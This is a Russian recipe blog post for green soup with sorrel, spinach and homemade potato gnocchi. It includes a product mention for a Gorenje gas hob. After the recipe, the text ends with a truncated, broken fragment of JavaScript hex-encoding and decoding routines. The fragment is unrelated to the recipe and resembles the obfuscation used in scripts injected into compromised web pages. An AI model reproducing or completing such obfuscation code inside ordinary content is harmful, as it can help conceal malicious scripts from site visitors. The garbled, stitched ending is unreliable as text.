Зеленый суп с ньокки
Это вариация на тему всеми любимого супа или борща со щавелем, но с итальянским акцентом. Вместо привычно порезанной картошки кубиками, в этом супе она превращается в клецки-ньокки, нежные и вкусные. Суп от этого конечно только выигрывает. Конечно и возни немного больше, но зато ньокки можно заготовить впрок. Я обычно делаю их двойную-тройную норму и замораживаю. Сначала разложив в один ряд на стеклянной доске, а когда подмерзнут-пересыпаю в пакет. Так они отлично хранятся, типа как пельмени .
А супы варить мне помогает газовая варочная поверхность GW65CLI от «Gorenje»
Ингредиенты:
1,5 литра мясного бульона
4 картофелины
125-150 грамм муки
1 яйцо
пучок укропа с петрушкой
2 пучка шпината
2 пучка щавеля
1 луковица
1 морковь
1 лимон
соль
перец
Готовим!
Для приготовления ньокки картофель отварить в мундире, немного остудить и натереть на мелкой терке или хорошо размять толкушкой для картошки. Далее добавить мелко порезанную зелень укропа и петрушки, яйцо, сок лимона, посолить и поперчить. Добавлять порциями муку, до получения пластичного теста. На посыпанной мукой доске необходимо сформировать из теста колбаски толщиной 1 см. и нарезать их кусочками по 1 см. Бульон довести до кипения, посолить. Лук нарезать полукольцами, морковь натереть на крупной терке или терке для корейской морковки. Положить овощи в кипящий бульон и варить 5-7 минут. Добавить ньокки, и варить еще 3 минуты. Щавель и шпинат вымыть, крупно порвать руками. Положить зелень в суп, варить 2 минуты и снять с огня. Посолить и поперчить суп по вкусу. Сразу подавать.
// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o